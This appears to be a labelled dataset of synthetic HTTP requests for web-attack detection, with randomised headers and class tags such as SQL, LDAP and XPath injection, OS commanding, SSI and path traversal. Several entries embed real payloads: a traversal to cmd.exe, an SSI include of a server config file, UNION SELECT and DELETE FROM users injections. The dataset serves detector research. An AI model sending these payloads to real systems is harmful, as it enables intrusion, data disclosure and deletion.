GET /olfiteiuaAls/iyceihf/eesmhihme76/ygeaee/cAJXaRV7NY7jwAR7jbEO/tG0EqaHaNg7/im.5BegBz3s@f/eQbyez/95YWcks-N7d0usN4Qr.cgi?obsstEror7sJ=dte&il=2807434&KsX8Zopencl=Qyf&tiinsitsn3=%29++++%28++%7C+++%28++cn%3D*o+++%27brien*++++%29%28mail++++%3D*o+%27brien*++%29++&iqhahioeenoxll=eeuREpMtDp HTTP/1.1
Host: 220.11.170.229
Connection: eedet
Accept: image/*, text/*;q=0.5
Accept-Charset: *
Accept-Encoding: deflate, deflate, compress
Accept-Language: *;q=0.1
Cache-Control: max-age=0
Client-ip: 116.63.205.12
Cookie: unteeo2=yatdjevhhousrccrs@l;j0dwwix3zsock_stream-=oyrS;rSuN=31016;weaTiy=064233802
Cookie2: $Version="689"
Date: Thu, 08 Jan 09 13:07:23 GMT
ETag: "WbPrN@xJVi3tQ@DS"
Expect: 2aro
From: ha6o@adqussrlf.gov
If-Modified-Since: Fri, 09 Mar 07 07:26:50 CET
If-Unmodified-Since: Wed, 07 Jul 04 16:26:38 UTC
If-Match: "WcYr04L_hY7FT3Yv"
If-None-Match: *
If-Range: *
Max-Forwards: 817
MIME-Version: 5.5
Pragma: ysenanRd='eo'
Proxy-Authorization: Basic dHRzc2U6YW10aA==
Authorization: NTLM MEJmc3M3YXQwc2dlNXRzZGF1dGNTTXRpc1BuZGF1dHM=
Range: 4549-1
Referer: /alpdsect/trorcita.pl
TE: gzip;q=0.1
Trailer: Pragma
User-Agent: Mozilla/8.3 (Machintosh; U; Mac OS X 3.5; tw-te; rv:1.8.1) Gecko/54643775
UA-CPU: 68000
UA-Disp: 854,896,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 6454x625
Via: FTP/1.6 198.32.110.87:2, tesuZe/6.1 146.211.227.171, iaclyc/6.6 37.179.245.83
Transfer-Encoding: vh7ku; iyiate=zlwamth
Upgrade: Ev8td4/8.8, eqerk/0.5, erNoe/4.2, ehp/2.5
Warning: 566 www.yfryp.tiff "ewpadovcn" 
X-Forwarded-For: 176.194.226.79
X-Serial-Number: 3515531846
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38333
Start - Id: 38513
class: LdapInjection
GET /window.openoFf/funionQwp-OqJo7TLRgB.aspx?nttUeLhhiu=ie+&eiiteaI=30896612&eslitEode=46244085&t4l=hsaboete4thl&Nueairnetvlxqn2=QmtrReaIh&nktoee7k=n&ifn1oTro4g9=httpYdosnl%2B9c&lheIpwmog=040304&ntde=566%29%28%26%28objectClass%3DT4Ue%29%28%7C%28sn++++%3D+tTKo%29%28cn%3DU++++J*%29%29&rfmi0ivoeen=wiezhdnc+s&li8neAprsa=5&etbas=eTXxwVeYKQ HTTP/1.0
Host: 67.124.159.148:80
Connection: keep-alive
Accept: image/*
Accept-Charset: iso-8859-8, iso-8859-7;q=0.8, windows-1251;q=0.6, iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: ehbwoit-t, usc-htdomy;q=0.1
Cache-Control: no-transform
Client-ip: 83.3.20.105
Cookie: uoo0i71hpn8=8gnd4oL;edjsgnrep=0;zt0nqa81dcmerm= em0;in=t@;roahsoaouN1Bbb=1ngoa4n;sskluooeysei=is;iten6moaxe T
Cookie2: $Version="388"
Date: Mon, 03 Jul 06 09:26:50 UTC
ETag: W/"6cabhDopjWR86jSj8-"
Expect: lsfu4ai=3wee;e2mko=metMe
From: lscomkd@ophedlorn.cz
If-Modified-Since: Sat, 17 Oct 09 17:34:26 UTC
If-Unmodified-Since: Wed, 19 Oct 05 06:36:08 GMT
If-Match: "cca5.6ISIkjdZr8kIR"
If-None-Match: "MeTw4Juv6m7qN.P6GA"
If-Range: "qN9HSGace9QIzq7r08zz"
Max-Forwards: 087
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest response="Fd6C0B3D3bd244b0cA2F85cC8f1AA3cb"
Authorization: NTLM OWhYczduY291cmthT2hTa3JvM3NoZW5vZVlycmtkdU9lZ3JlYWVxbm52
Range: -087,245-62681,-648438
Referer: http://www.e8se73mo.it/aT5cp.wav
TE: gzip,deflate,trailers
Trailer: Warning
User-Agent: Mozilla/6.1 (Machintosh; U; PPC Mac OS X 8.6; Vt-tr; rv:0.2.3) Gecko/76220662
UA-CPU: 68000
UA-Disp: 8582,573,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 877x552
Via: HTTP/0.1 www.xuhe.jpg
Transfer-Encoding: ehiyol; lsna=jfcsaoq1
Upgrade: liDg/6.9, m3r2/7.5
Warning: 474 3.199.185.32 "psgyu2iuh9p6t" "Wed, 30 Jul 08 06:32:37 UTC"
X-Forwarded-For: 172.88.16.189
X-Serial-Number: 30599
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38513
Start - Id: 44322
class: OsCommanding
GET ..%c1%pc...%c1%pc..%c1%pc..%c1%pc..%c1%pc../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: 128.194.8.78:291
Connection: close
Accept: audio/*, application/zip;q=0.1, video/*
Accept-Charset: big5;q=0.7, windows-1257, koi8-r;q=0.0
Accept-Encoding: *;q=0.3
Accept-Language: tU-od;q=0.1, s72en-kltQhrt;q=0.9, An-eWaaoobr;q=0.4
Cache-Control: no-store
Client-ip: 224.122.29.23
Cookie: aNmynoleV3teth=iWZUqKCGOH;p0iar4P@cbtmp=0r;YHnot=mr;eIs=teYi
Cookie2: $Version="7"
Date: Sun, 08 Feb 09 05:03:30 GMT
ETag: "8n0SdKaafzTrTySu-@"
Expect: 100-continue
From: ssaaei@srTei5is.de
If-Modified-Since: Wed, 14 Oct 09 06:49:02 UTC
If-Unmodified-Since: Mon, 28 Aug 06 01:36:39 UTC
If-Match: "LRG0pPP2XtqJ6AhBRLhw"
If-None-Match: "PBInhx31w7nxij-"
If-Range: Wed, 15 Aug 07 13:16:52 UTC
Max-Forwards: 3
MIME-Version: 1.6
Pragma: dsrrEr0a='elsfeii'
Proxy-Authorization: NTLM dXY5c2NobmNSZ2NhMGFpbmJ0dHhyMGlrRWFEbzNnaHRtZQ==
Authorization: NTLM ZnJuMWE0dHRoZHNyandud2lkZzg4dGhoY3NlZWhvdnVvbXQx
Range: -4,244872-
Referer: /Eebsy9.pl
TE: deflate,trailers
Trailer: If-None-Match
User-Agent: Mozilla/8.9 (X11; U; Solaris 6.6; oI-ar; rv:9.2.7) Gecko/16955848
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 5984x276
Via: 4.0 www.ttekp.shtml, FTP/3.1 224.85.199.129
Transfer-Encoding: compress
Upgrade: ott9i/7.1, tei/4.6
Warning: 477 www.oeiseg.css:177 "oNngqeeniilu" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44322
Start - Id: 37685
class: LdapInjection
POST /ysmPXm/nLm9LPj6HE/ea6EtsdieTs/rrRjUZq6xG3-VpsO/CsetciLv.php3? HTTP/1.0
Content-Length: 193
Content-Language: 6kdq
Content-Encoding: compress
Content-Location: /yjpQnbs/uo4t.jpg
Content-MD5: MnRhdVRudWFuaWxuaXJocw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 23 Nov 05 23:35:57 UTC
Last-Modified: Fri, 03 Mar 06 03:09:09 CET
Host: www.we6paa3i.net
Connection: close
Accept: image/*;q=0.1, audio/*, image/gif;q=0.0
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 28.10.194.170
Cookie: qXrI-3w=a &fsam;alit=46qoNneEiqso;gmmwOSEnh=7esc;rs=ttesIgarph;udNs1aaaaxutpes=275855529;hldLewei=2GxF3T
Cookie2: $Version="2"
Date: Wed, 29 Aug 07 04:36:18 CET
ETag: W/"_@vqRjVs1bA1_fJ"
Expect: 100-continue
From: 2tnped@tsctjtsnt.gov
If-Modified-Since: Mon, 26 Jan 09 13:44:08 GMT
If-Unmodified-Since: Tue, 07 Aug 07 12:24:47 UTC
If-Match: "8cRKgaQUJfQliq477"
If-None-Match: "gv4UFAO-hQSPizwFW"
If-Range: *
Max-Forwards: 040
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: NTLM SWlzM250b2VobmFpc3Jlb2Exb3RnaXpnaU5vYm1ucmVyYmQ5aU5FRGhzY3JqZGs=
Authorization: Digest qop=auth
Range: 6058-6,88-,-245437
Referer: /viaOn.zip
TE: chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: Mozilla/8.1 (Machintosh; U; PPC 8.6; ra-wm; rv:0.0.8) Gecko/00568524
UA-CPU: MIPS
UA-Disp: 533,555,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 940x1719
Via: uxedy/0.9 218.222.58.30
Transfer-Encoding: identity
Upgrade: ldon/1.3, oeCc/5.2, eia/8.5, wqT/7.2
Warning: 355 www.dT68.js "3Sthowaroorcrdfemtte" "Tue, 02 Mar 10 18:12:18 UTC"
X-Forwarded-For: 66.23.157.210
X-Serial-Number: 7386288464563322200
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gpmo=fcdugOdgroup byrm8t b0+0e&eeperaeetry=es)(|  (or8=*)&S4Typydnfn=ogrueasc&lwoe9n=ne&evGuhasnl=4570&ysnocA6suhh=\4bule&lsewEiinnevet=uishtnre&w5dBHpgw=ed.nhe&OAh2edrmwd=pre94

End - Id: 37685
Start - Id: 35495
class: XPathInjection
GET /p4vDZAm6s/phpf6system_vbscriptaUq2Qfrom/qLVS1i_6BgSJ.9WX_MJ/iGTtk3VPand-N/O2tonMirh/iup0y.tiff? HTTP/1.1
Host: 202.11.69.135:80
Connection: keep-alive
Accept: audio/*
Accept-Charset: x-mac-roman, windows-1251;q=0.3, cp-936, iso-8859-5
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 209.250.192.160
Cookie: uat3=91930;ezWvWlbs_Rv=(i  <   count(e1iwe/child::text()) and     j < count(6erp/child::comment())   and     k <  count(hre1a/child::*)  );RKbtcdsU=622423;ioanUS4e=41;eKIiiopem6te3t= j
Cookie2: $Version="4"
Date: Tue, 29 Apr 08 02:04:10 UTC
ETag: W/"Gjk5yTrGRwXduHBjQ"
Expect: annafei=outUe5;w4Pna=itnob
From: a8rg@iaaSadh.uk
If-Modified-Since: Tue, 01 Sep 09 07:46:47 GMT
If-Unmodified-Since: Fri, 06 Aug 04 01:38:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 8.9
Pragma: eaenr2g=ulsaI
Proxy-Authorization: Basic UXVtaXBuOkNhc2RyZXRl
Authorization: N373pa nrenh=iswsnx
Range: 2-37781,-037,39-
Referer: http://www.onucd.uk/phsshe/roT7.fgf
TE: gzip,chunked,trailers
Trailer: Upgrade
User-Agent: tNfHtDUwK http://www.et6o.fr
UA-Disp: 8924,467,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 053x299
Via: HTTP/2.5 www.1omv.js, 9.1 www.aro1rl.jpeg:3085, HTTP/8.1 9.57.110.38
Transfer-Encoding: ebr76; ut51g=htlohZ4
Upgrade: iio/8.3, nnpE/7.4
X-Forwarded-For: 184.57.165.17
X-Serial-Number: 480631962550690489
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35495
Start - Id: 48601
class: XPathInjection
POST /qzoenoey94hp/eRa7t7em4esfsr/6rODfcIVZHlrFg./eZgmPzPwKRx/ytofco7prf4aub/p8oruaastgxT2hwm7dns/ae1eoe5ukrurybmjs/ssotncrinX9lcia2ol.jsp? HTTP/1.0
Content-Length: 402
Content-Language: tle7,navng
Content-Encoding: compress
Content-Location: /xbRctstm/tdrn5/Tnrate.htm
Content-MD5: dXBsaWxhZWhhWnRpb21oZw==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 15 Aug 09 16:00:58 UTC
Last-Modified: Thu, 24 Feb 05 04:51:40 GMT
Host: www.heeknnm.biz
Connection: close
Accept: text/*, audio/x-wav;q=0.6
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.9
Accept-Language: ino-f5Ht8m, eo-h, eki-rrdtx;q=0.8
Cache-Control: td3o9ga=zomenoo
Client-ip: 58.151.109.14
Cookie: iniaih=1;C5XPn2.=364953572;Sdoc9i2d=efadmintp;ayzrAtd=0462314207
Cookie2: $Version="357"
Date: Tue, 13 Sep 05 17:06:22 UTC
ETag: W/"8nwUpGX1@vrk.uB0bqTM"
Expect: 100-continue
From: LhY2ychA@lseaat.st
If-Modified-Since: Mon, 03 Jan 05 21:47:28 CET
If-Unmodified-Since: Thu, 11 Dec 08 13:19:55 CET
If-Match: "Mm83On1z6kdrQw3g0D"
If-None-Match: "iWTwWoQsVMvsBqR3"
If-Range: "eK7x7COBp1sq9sCZ"
Max-Forwards: 3051
MIME-Version: 0.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/el7b/irssube/Nphsudwt/oP1eeb.txt
Authorization: 4diei hihre=ede5gO5
Range: 3-574
Referer: http://www.Sra9.de/i9ebb/iEc5nhpi/uitc/ldaorgmg/nweSnoar.js
TE: deflate;q=0.4
Trailer: Authorization
User-Agent: Mozilla/1.2 (Windows; U; Win98 6.5; pl-eo; rv:8.4.1) Gecko/50727791
UA-CPU: Sparc
UA-Disp: 5404,3137,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 853x5228
Via: 8.9 www.4fItt.css, sAtsno/0.6 www.tSy5m2.shtml:516
Transfer-Encoding: ssflt; sTismql=sxtoa
Upgrade: nosb/0.4, m6epm/3.8, n3lo/2.7
Warning: 711 www.2azi1lut.css "nhuTpph3osOgtutn" "Sun, 02 Nov 08 07:06:07 CET"
X-Forwarded-For: 90.231.108.36
X-Serial-Number: 4557952
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

egb3ret=eL6y&eAhoet=ocE\&tz=hTDdN&lZknripcehhhHap=tzea|a[&db3T2as2hm=17084&UFphsAU5-V_L=42&eh8ltbxye=1954&aOvinEflPnc=iOwnulle1nbetweenmnph- ko71gt&TlDhuh=eom86&utsit3i2ml=ecer&6estlodmYoti=erX&jiy8xelaeEtsr=ez/iAce55/1ime/child::node()[    position()=73]     | en/tr/Hecd/child::text()[position()=37]   or 'md' =   '&ipriinlnnkpax=3)ny

End - Id: 48601
Start - Id: 39851
class: SSI
POST /2i/l0.nsf? HTTP/1.0
Content-Length: 237
Content-Language: rDav
Content-Encoding: deflate
Content-Location: http://92rmlqA6.gov/c5wg.asp
Content-MD5: dWFhZ3RraG02cHNvcmxpaA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 27 Feb 07 08:07:18 UTC
Last-Modified: Wed, 08 Aug 07 09:31:33 UTC
Host: www.ulatwlmw.be:80
Connection: eeqnedj
Accept: video/*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *
Cache-Control: nos=emmcnlSy
Cookie: alacjJaleysoePt=<!--  #include  virtual="/etc/httpd/httpd.conf"    -->;HoBsoo8gase0uWs=nezCm
Date: Tue, 04 Nov 08 09:26:46 CET
Expect: 100-continue
From: biu6nh@gel86etaot.com
If-Modified-Since: Tue, 26 Sep 06 16:47:09 CET
If-Unmodified-Since: Sat, 26 Apr 08 23:08:14 UTC
If-Match: *
If-None-Match: "uj6UScgP6mHKnVPU"
If-Range: *
Max-Forwards: 453
MIME-Version: 9.0
Pragma: st=tbqs
Authorization: Basic U2xlTkVlOmZhbG5rRXQ=
Referer: http://www.Qfaghe.ch/scezy/4HtnOgd/lee6s1b/spxpPylt.jpeg
Trailer: Expect
User-Agent: dgdv5M (sK1631dH; d_VWaoI34; or8Y3Z; 55msTN8)
Via: HTTP/9.9 176.201.251.98
Warning: 361 14.205.186.210 "sUfuhrilelbElers" "Sun, 21 Jan 07 21:32:04 GMT"
----: -------------------------------------------

esshxlzfax=09522&mcwajenus5rnii=ycmda&sud=eeT&JvKMa=487gPiw sxmfhd&uonse1Ctrndits=04653&slatrscoot=autoexecs&ues6roge9ro=tsaDcaerwTteitp&roeA2qnht7dr=iin/&oeo=273209744&neasltbrceeeuwy=0648794&ttawt=gKpWenG&4hlso=3Mi(/aPeo% sslge

End - Id: 39851
Start - Id: 45160
class: PathTransversal
GET /../../? HTTP/1.1
Host: www.ytddqel.uk:61
Connection: noen
Accept: audio/x-wav, text/*;q=0.8
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 168.50.166.68
Cookie: hmkrrRwaslears=eordXhacikateye;hna5lunh=homem opassthrulordn)us;anDmsu= dcati3ha\demt-0air
Cookie2: $Version="70"
Date: Wed, 03 Sep 08 22:59:59 GMT
ETag: W/"fJzIz8jtWw2VDvgEB"
Expect: 7Eepf5
From: hdOf9re@eutwEh.uk
If-Modified-Since: Wed, 06 Oct 04 19:14:39 UTC
If-Unmodified-Since: Sun, 13 Jul 08 18:52:16 UTC
If-Match: "R8jeAAwLGcjhdVU"
If-None-Match: *
If-Range: Mon, 02 Oct 06 16:27:43 CET
Max-Forwards: 372
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: Digest uri=/e1iBf/tmad/iteoqSih/EPRw/eq6pop.gif
Authorization: taTsdb aitarUn=enijlRs
Referer: http://tionou.ch/55eethl/jrno/wimb/Cfmar.mdb
TE: trailers,chunked,trailers
Trailer: Date
User-Agent: slaeoReekP
UA-Disp: 8494,699,8
UA-OS: Win98
UA-Pixels: 1177x8327
Via: FTP/3.1 www.rata.css:321, FTP/1.5 188.72.187.99:795, FTP/6.6 www.ede7.shtml:463
Transfer-Encoding: compress
Upgrade: 7aW/4.1, nTewc/8.8, eenf/6.5, bhs/8.1
Warning: 543 www.sdsds.css "ealt1ar6synhZ" 
X-Forwarded-For: 249.70.128.210
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 45160
Start - Id: 41520
class: SqlInjection
POST /-F8Vg/8_orhHVuSnGn79QiE_hc/HVN8BZU.y0PaKbo/S4e0ao/oL@N.dll? HTTP/1.1
Content-Length: 295
Content-Language: ttkg
Content-Encoding: compress
Content-Location: /ikmNlou/nudreN.cfm
Content-MD5: c29laGlldGlhZTI5U3JyZw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 10 Jul 09 01:36:50 CET
Last-Modified: Sat, 06 Oct 07 08:27:00 UTC
Host: www.dittaio6yh.cz:80
Connection: reet
Accept: text/xml, text/*
Accept-Charset: windows-1257;q=0.0, iso-8859-8;q=0.2, cp-932;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: 7ul='i0fSiR'
Client-ip: 1.117.126.196
Cookie: Ott=8lcWhFi;8.evZ5sb=73;niTNStkrtlwlpdm=t
Cookie2: $Version="16"
Date: Mon, 23 Jul 07 05:14:45 CET
ETag: "_vMH@4MNLWv9FY-"
Expect: maEbbf
From: tdvdi@oee6.st
If-Modified-Since: Sat, 25 Apr 09 21:17:02 GMT
If-Unmodified-Since: Mon, 10 Apr 06 23:38:34 CET
If-Match: "vVn@nhdmuA2X9zNAGy0f"
If-None-Match: "zhQtOCN1clAtH_d4pSbU"
If-Range: *
Max-Forwards: 3535
MIME-Version: 9.8
Pragma: no-cache
Proxy-Authorization: NTLM dEU5ZGE5bXRvc1NwYVNlZXlueGFwM3RqdHRuZkJkYWRmYWI0
Authorization: war8dc vont=sei1
Range: -68
Referer: http://www.oEds.cz/sedrih/Nreal/uoydeRsn/Ljmodn/tDlglstg.pl
TE: trailers,gzip;q=0.7,deflate;q=0.2
Trailer: User-Agent
User-Agent: Mozilla/7.5 (X11; U; Linux i386 2.8; of-nx; rv:7.2.7) Gecko/42026961
UA-CPU: MIPS
UA-Disp: 8226,551,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 6912x601
Via: 4.6 www.Antsty.shtml, 2.8 174.92.81.0:4457
Transfer-Encoding: iebnb
Upgrade: thce3c/8.9, 137aa/4.9, 5eyy/9.6
Warning: 403 68.147.161.49 "4oeh1aeq0hls" 
X-Forwarded-For: 202.241.229.181
X-Serial-Number: 6237226305508453843
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

n6aiasarso=38045&tnuajtab4iHme=4o(e&h3on=naslsI2'  );DELETEFROMusersWHEREupper(username)    =upper(    'admin&heitbairre3=positiontsa&Gtrmh88tljr6o=ttsay8gsnv;3p&a1oti=mEihomeh&iqrrtjeidSirar=7&iangsy=qocdeleteuhHl-n&it7n=oeN9ttsi&0hnotodE02=554751&nfncleznceYpriu=8187396400

End - Id: 41520
Start - Id: 42671
class: SqlInjection
GET /FzmXfV4Y/RrardEouomcoeMeosme/Fzyfrom_w4/toc8ita.php?oe=%27+++%29++UN%2F**%2FION+++++ALL+SEL%2F**%2FECT++++%27ctnYtltnco%27%2C2083%2C1022%2C%27lwsonddero%27%2C9+FROM++++drSnnnta++++WHERE++%28%27%27+++%3D++++%27&donikm0elqdd6i=27694155 HTTP/1.1
Host: 7.253.81.85
Connection: close
Accept: */*
Accept-Charset: iso-8859-8-i, x-mac-arabic
Accept-Encoding: gzip, gzip, identity;q=0.1, compress, identity
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 179.202.66.201
Cookie: set1lo9iesqe2s=9005384813;yaEAegezlso=77957480;dtcmetaa=wonwmwma9non;in=ttTE;Vl1Fte=h<uf
Cookie2: $Version="1"
Date: Wed, 04 Jul 07 18:41:48 GMT
ETag: W/"uROPmH-wt_Abq65K3"
Expect: itee
If-Modified-Since: Fri, 11 Apr 08 04:19:16 GMT
If-Unmodified-Since: Fri, 23 Feb 07 15:18:07 UTC
If-Match: "jULdndvovV6X@mq"
If-None-Match: "mgM3YBhDL8pYO.wlO"
If-Range: "smnc27za56MrM8nmBam"
Max-Forwards: 08
MIME-Version: 1.1
Pragma: ndhf=ahbcsEiM
Proxy-Authorization: Basic eWFlckVMOnI3NHRu
Authorization: Digest uri=http://azuaI9e.uk/ietnnrf/heam/pansraeb/pqtue.exe
Range: 73002-0
Referer: /tptawoe.mp3
TE: trailers,gzip,chunked;q=0.7
Trailer: Accept
User-Agent: 6Atshieg/2.0.8
UA-CPU: PowerPC
UA-Disp: 000,128,8
UA-OS: Windows 98
UA-Color: color32
Via: HTTP/7.4 www.Nc5uulo.js
Transfer-Encoding: identity
Upgrade: eeog/2.4, mitts/3.0, e6e3i/4.3, oaelt/5.7, heNtCn/4.2
Warning: 398 www.oest9ct.png:70 "Iwcjoteska" "Fri, 08 May 09 18:31:41 CET"
X-Forwarded-For: 113.84.223.129
X-Serial-Number: 328822
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42671
Start - Id: 45192
class: PathTransversal
GET /./? HTTP/1.1
Host: 191.148.169.180
Connection: 4resn6C0
Accept: video/*
Accept-Charset: x-mac-greek;q=0.0, x-mac-greek;q=0.5, x-mac-icelandic, windows-1257;q=0.0, x-mac-ce;q=0.1
Accept-Encoding: 
Accept-Language: kaoyelY-pgit
Cache-Control: min-fresh=75
Client-ip: 30.124.242.244
Cookie: teO7mIltat46s=a1pt;wo4=8356503535;Rf1lacceptexecgG=uP6VkU7iZWW;rtEv2law=http=O nr0Qadmintof;cHfcmhspX5=o1duneaitaglc4
Cookie2: $Version="339"
Date: Fri, 04 Feb 05 04:41:15 UTC
ETag: W/"5P7OUM98bOhr6Jn"
Expect: 100-continue
From: azaxo6@aowhloiie.net
If-Modified-Since: Tue, 21 Jun 05 09:31:28 GMT
If-Unmodified-Since: Thu, 10 Feb 05 09:44:14 CET
If-Match: "3rugntQ@XvByb0okNWhD"
If-None-Match: "wkW908nD@s64TjzHLTy"
If-Range: Sat, 30 Jul 05 12:00:22 CET
Max-Forwards: 8730
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: nb6je iukaapia=w5hm8
Authorization: NTLM bGluZXNibG1hZmFxZ2hlcmNhcHR0QW9IaWk3YmF1bTNzc3Zz
Range: 338-,-31040,26925-
Referer: http://sfs5.biz/ganthdO/tsrA/prb4ev/tn1e1aa/UOl3H.tar
TE: gzip;q=0.1,chunked
Trailer: User-Agent
User-Agent: ghos/5.1.7
UA-CPU: StrongARM
UA-Disp: 749,556,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 2083x0053
Via: 5itt/6.3 www.aogenne.js, bhh/5.3 www.nkrnp.htm
Transfer-Encoding: compress
Upgrade: eimdea/6.6
Warning: 653 www.et0aI7.gif "huimuuaeets1Hsgeeh3t" 
X-Forwarded-For: 254.171.174.88
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45192
Start - Id: 49113
class: XPathInjection
GET /tzaaeaewiOeih1Do.png?nWHvnuElhyrabh=021L1Ob&l6n=650&9HdnccrbtoveUdd=oshr1%275xne%26ineq&dgchn=ehtn&eiai=odAsa&StCDsam5vcoIe=govwtioIeo&reqneufg1o=40&OL61xJ=5oeaoat1olrcl7tw&eeTsb4de8=c3tb%2B8bgsoundh%3Bt%261e7h4e%26ol&ntEonezl6rsar=ahiE2hnr272es&mmST=669&nntedeaRseeshEt=passwd8ecbu3shr&0linklikey=ithrdea%27++or+++1%3C+nefur%2Fei%2Ffnrd%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D4%5D+++++or+%27errra%27%3D+++%27 HTTP/1.0
Host: 215.147.179.250
Connection: keep-alive
Accept: video/*;q=0.8, audio/basic;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: voaAoue-ryhga0y;q=0.7, C98onh-mae
Cache-Control: min-fresh=06690
Client-ip: 75.155.123.132
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Sat, 20 Jan 07 24:55:43 UTC
ETag: "vzdQL-TvdBmv@UeHw"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Tue, 02 Mar 04 06:30:44 GMT
If-Unmodified-Since: Sat, 06 Dec 08 04:43:18 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 29 Nov 09 06:11:28 UTC
Max-Forwards: 8438
MIME-Version: 8.7
Pragma: 1jjer=aiihc
Proxy-Authorization: Basic bHBFdXo6cmY4cmkyUw==
Authorization: snlode taofp=rint
Range: 1-
Referer: /Sts6u7/snoeoe/edfei.js
TE: chunked,trailers,trailers
Trailer: Referer
User-Agent: Mozilla/9.6 (Machintosh; U; PPC 7.3; pw-nw; rv:2.0.4) Gecko/94074988
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 9298x371
Via: 9.4 105.145.37.4:8818, HTTP/3.1 67.67.54.173, 1.6 www.EasavI.png
Transfer-Encoding: compress
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 856 173.35.211.19 "ihersc3ga8taanoissh" 
X-Forwarded-For: 0.51.163.102
X-Serial-Number: 2617169573
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 49113
Start - Id: 48870
class: XPathInjection
GET /vPMWWnBuU0/iJ/qotee5vel/qnSdtlbb/aIvF8DHDG058S56dTb/rrMYvo3Wr5P/l4/52EZi/w0yMZBVteJSg52H/aRiavwtdtatoqohzerw/okJxU4PynT/oaaa.exe?iierqi8edrYesee=tc%2Fg%2Fnii%2Fchild%3A%3Anode%28%29%5B+++position%28%29%3D78%5D+++++%7C+ot%2Fo8s%2Ft8%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D88%5D+++or++++%27mNlji%27+++%3D++%27&6Neg=iS1g+vn7+4%25u7Boo HTTP/1.0
Host: 236.13.130.142:2
Connection: 2slee
Accept: video/*;q=0.5
Accept-Charset: windows-1250;q=0.4, windows-1251;q=0.1, iso-8859-9;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 81.197.139.145
Cookie: aeabnCatuni=152634;eoiuws8i=Ego;ZmochahHx=rhlseblireimgyrcs;tOrleltcaasosb=317
Cookie2: $Version="488"
Date: Mon, 10 May 04 09:18:43 GMT
ETag: "_fRV_D@7oKn-qsK"
Expect: dn6t
From: cSenj7od@i5ssuRhni.com
If-Modified-Since: Mon, 06 Nov 06 09:09:06 CET
If-Unmodified-Since: Tue, 03 May 05 19:55:59 CET
If-Match: "0zapZ_yPZGKOXHkUbo_"
If-None-Match: *
If-Range: *
Max-Forwards: 234
MIME-Version: 4.5
Pragma: no-cache
Proxy-Authorization: Basic aHdmYTY6RXk3aw==
Authorization: NTLM cWViYm9OZWJaaHR3cm9hZW5yeXNBaGR1aEVFbnVlbm50aXQyYjNzcm5lYXRmcw==
Range: 03033-94733
Referer: http://www.atwa.be/sinseig/idteon8l/8i9EN.cgi
TE: trailers,trailers,gzip
Trailer: Accept-Charset
User-Agent: Mozilla/7.0 (X11; U; Solaris 0.6; de-ea; rv:1.4.0) Gecko/20311294
UA-CPU: MIPS
UA-Disp: 184,1119,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1420x8323
Via: 2.8 238.120.164.33, HTTP/3.2 11.144.65.141
Transfer-Encoding: compress
Upgrade: cntr/0.2, fRir/4.0, qalsS/7.9
